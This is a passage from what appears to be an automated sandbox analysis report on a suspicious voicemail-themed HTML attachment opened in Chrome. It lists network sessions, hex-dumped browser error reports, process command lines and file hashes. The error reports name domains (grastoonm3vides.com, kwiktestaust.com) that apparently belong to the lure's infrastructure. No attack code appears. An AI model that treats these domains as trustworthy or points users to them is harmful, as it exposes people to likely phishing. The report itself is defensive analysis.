                                                                Connection: keep-alive
                                                                Origin: https://grastoonm3vides.com
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:42:02 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: OPTIONS, POST
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-type, content-length
                                                                date: Thu, 07 Nov 2024 20:42:01 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.164982335.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:42:02 UTC544OUTOPTIONS /report/v4?s=vykAgte5OM4G6u19ccgTxpcldUiZvNd00nQKoMx7vB7IPrq2kdgkGhv4TZNQ%2FBqqnTe18AhFG34Zwy7c4Mxc%2Fh7MBmoCaFcGrcdG%2FwXbiilc6OXKWL%2F354jpptno14v7MFw7lNpO HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://grastoonm3vides.com
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:42:02 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: OPTIONS, POST
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-type, content-length
                                                                date: Thu, 07 Nov 2024 20:42:02 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.164982435.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:42:02 UTC480OUTPOST /report/v4?s=XzHSxPrFpfb4b1Ai2sbL4xWVCqAN8nz38lrOH%2BHtQRRe356a3fFoayAr4L7pnvLuiDQOgzozgzgx1wf5vtf8jV3B4Qu3jRQXOvaR%2B7Ocz4bWtwwjQ1a0w7Pe%2FixYLutVstZILIkR HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 447
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:42:02 UTC447OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 37 37 35 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 38 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 77 69 6b 74 65 73 74 61 75 73 74 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 72
                                                                Data Ascii: [{"age":37759,"body":{"elapsed_time":1183,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://kwiktestaust.com/","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://gr
                                                                2024-11-07 20:42:03 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Thu, 07 Nov 2024 20:42:02 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.164982535.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:42:02 UTC483OUTPOST /report/v4?s=vykAgte5OM4G6u19ccgTxpcldUiZvNd00nQKoMx7vB7IPrq2kdgkGhv4TZNQ%2FBqqnTe18AhFG34Zwy7c4Mxc%2Fh7MBmoCaFcGrcdG%2FwXbiilc6OXKWL%2F354jpptno14v7MFw7lNpO HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 1359
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:42:02 UTC1359OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 37 31 36 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 39 36 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 32 32 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 72 61 73 74 6f 6f 6e 6d 33 76
                                                                Data Ascii: [{"age":27169,"body":{"elapsed_time":39600,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":522,"type":"http.error"},"type":"network-error","url":"https://grastoonm3v
                                                                2024-11-07 20:42:03 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Thu, 07 Nov 2024 20:42:02 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:15:39:56
                                                                Start date:07/11/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#U25b6#Ufe0fVmail__00_15.html
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:15:39:56
                                                                Start date:07/11/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1956,i,15275357982726791337,180945757907666501,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                No disassembly